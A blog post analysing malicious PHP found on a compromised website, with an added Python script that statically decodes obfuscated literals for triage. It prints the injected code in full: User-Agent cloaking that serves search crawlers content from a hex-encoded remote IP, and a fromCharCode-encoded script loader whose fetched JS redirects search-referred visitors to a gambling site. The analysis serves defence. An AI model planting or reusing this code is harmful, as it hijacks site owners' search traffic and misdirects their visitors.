PHP pack() function


Author: zlchen | Published: 2020-06-23 22:24 | Views: 0

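Today I ran into a problem: when a customer opened their own website in 360 Browser's "Speed Mode" it displayed normally, but in 360 Browser's "Compatibility Mode" it jumped to a gambling site. What was causing this? It turned out that malicious code had been injected into the site.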

The code is as follows:

 <?php

 $key= $_SERVER["HTTP_USER_AGENT"];
 if(strpos($key,'spider')!== false || strpos($key,'bot')!==false || strpos($key,'rident')!==false || strpos($key,'so')!==false || strpos($key,'aidu')!==false || strpos($key,'ogou')!==false)
 {
   header("Content-Type: text/html;charset=gb2312");
   $host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
   $file = file_get_contents(pack("H*","687474703a2f2f3130332e3232392e36362e3132343a383033312f")."/index.php?host=".$host_name."&url=" . $_SERVER['QUERY_STRING'] . "&domain=" . $_SERVER['SERVER_NAME']); 
   echo $file;
   exit();
 }else{
    echo '<script type="text/javascript"> var xt = String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,115,102,104,117,102,104,50,46,99,111,109,47,52,52,49,55,55,57,46,106,115,34,62,60,47,115,99,114,105,112,116,62,); document.write(xt); </script>';
 }
 
 ?>

At first glance this code is hard to read, especially these parts:

//PHP
pack("H*","687474703a2f2f3130332e3232392e36362e3132343a383033312f")
//JavaScript
echo '<script type="text/javascript"> var xt = String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,115,102,104,117,102,104,50,46,99,111,109,47,52,52,49,55,55,57,46,106,115,34,62,60,47,115,99,114,105,112,116,62,); document.write(xt); </script>';

First, let's look up some documentation:

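Definition and usage
The pack() function packs data into a binary string. With the format H*, the argument is read as a hex string (high nibble first) and returned as the corresponding bytes.
Running it gives the following result: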
[root@VM_0_11_centos phpspider]# php -a
Interactive shell

php > echo pack("H*","687474703a2f2f3130332e3232392e36362e3132343a383033312f");
http://103.229.66.124:8031/
php >

Let's open that URL and take a look:

[Screenshot: image.png]
Common search engine names and their HTTP_USER_AGENT values

Baidu: baiduspider
Google: googlebot
Sogou: sogou
Tencent SOSO: sosospider
Yahoo: slurp
Youdao: youdaobot
Bing: bingbot
MSN: msnbot
Alexa: is_archiver

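What the crawlers fetch is the content of http://103.229.66.124:8031/, not the content of the customer's website. No wonder the complaints about the Baidu snapshot could not get it deleted or updated. The same branch also tests for 'rident', which matches the Trident token in IE-engine User-Agent strings, consistent with the gambling content appearing only in 360 Browser's Compatibility Mode.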

Now let's see what the following JS code does:

var xt = String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,115,102,104,117,102,104,50,46,99,111,109,47,52,52,49,55,55,57,46,106,115,34,62,60,47,115,99,114,105,112,116,62,); document.write(xt);

The character codes spell out a script tag whose src is https://sfhufh2.com/441779.js.

Let's open https://sfhufh2.com/441779.js and take a look:

var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?9266e837c551f81c46e40f8336d58596";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();

document.writeln("<script LANGUAGE=\"Javascript\">");
document.writeln("var s=document.referrer");
document.writeln("if(s.indexOf(\"baidu\")>0 || s.indexOf(\"sogou\")>0 || s.indexOf(\"soso\")>0 ||s.indexOf(\"sm\")>0 ||s.indexOf(\"uc\")>0 ||s.indexOf(\"bing\")>0 ||s.indexOf(\"yahoo\")>0 ||s.indexOf(\"so\")>0 )");
document.writeln("location.href=\"https://441779.com\";");
document.writeln("</script>");

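As the code above shows, anyone who searches for a keyword on Baidu, Sogou, SOSO, UC, Bing, a mobile search engine and so on, finds the site in the results and clicks through is redirected to https://441779.com.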
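For triage, the two encodings analysed above (pack("H*", ...) in PHP and String.fromCharCode(...) in JavaScript) can be decoded statically, without running the injected code or contacting the hosts it names. The script below is an added example, not part of the original post; the names decode_literals and SAMPLE are assumptions, and SAMPLE is constructed from two abridged lines of the code shown above.

```python
import re
import sys

# The two literal encodings seen in the injected code on this page.
PACK_HEX = re.compile(r'''pack\(\s*["']H\*["']\s*,\s*["']((?:[0-9a-fA-F]{2})+)["']\s*\)''')
FROM_CHARCODE = re.compile(r'String\.fromCharCode\(([\d\s,]+)\)')
URL = re.compile(r'''https?://[^\s"'<>]+''')


def decode_literals(source):
    """Decode obfuscated literals statically (nothing is executed or fetched).

    Returns (kind, line_number, decoded_text, urls) tuples in file order.
    """
    hits = []
    for m in PACK_HEX.finditer(source):
        text = bytes.fromhex(m.group(1)).decode("utf-8", errors="replace")
        hits.append(("pack-hex", m.start(), text))
    for m in FROM_CHARCODE.finditer(source):
        # findall skips empty items, so the trailing comma in the sample is tolerated.
        codes = [int(n) for n in re.findall(r"\d+", m.group(1))]
        # fromCharCode works on UTF-16 code units, hence the 16-bit mask.
        text = "".join(chr(c & 0xFFFF) for c in codes)
        hits.append(("fromCharCode", m.start(), text))
    hits.sort(key=lambda h: h[1])
    return [(kind, source.count("\n", 0, pos) + 1, text, URL.findall(text))
            for kind, pos, text in hits]


# Constructed sample: two lines abridged from the injected PHP shown above.
SAMPLE = r'''<?php
$file = file_get_contents(pack("H*","687474703a2f2f3130332e3232392e36362e3132343a383033312f")."/index.php?host=".$host_name);
echo '<script> var xt = String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,115,102,104,117,102,104,50,46,99,111,109,47,52,52,49,55,55,57,46,106,115,34,62,60,47,115,99,114,105,112,116,62,); document.write(xt); </script>';
'''

if __name__ == "__main__":
    # Pass file paths as arguments; with no arguments the embedded SAMPLE is scanned.
    texts = {p: open(p, encoding="utf-8", errors="replace").read() for p in sys.argv[1:]}
    for name, src in (texts or {"<sample>": SAMPLE}).items():
        for kind, line, text, urls in decode_literals(src):
            print(f"{name}:{line}: {kind}: {text!r} urls={urls}")
```

Run it over the PHP and JS files in a web root and review every decoded URL that does not belong to the site.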
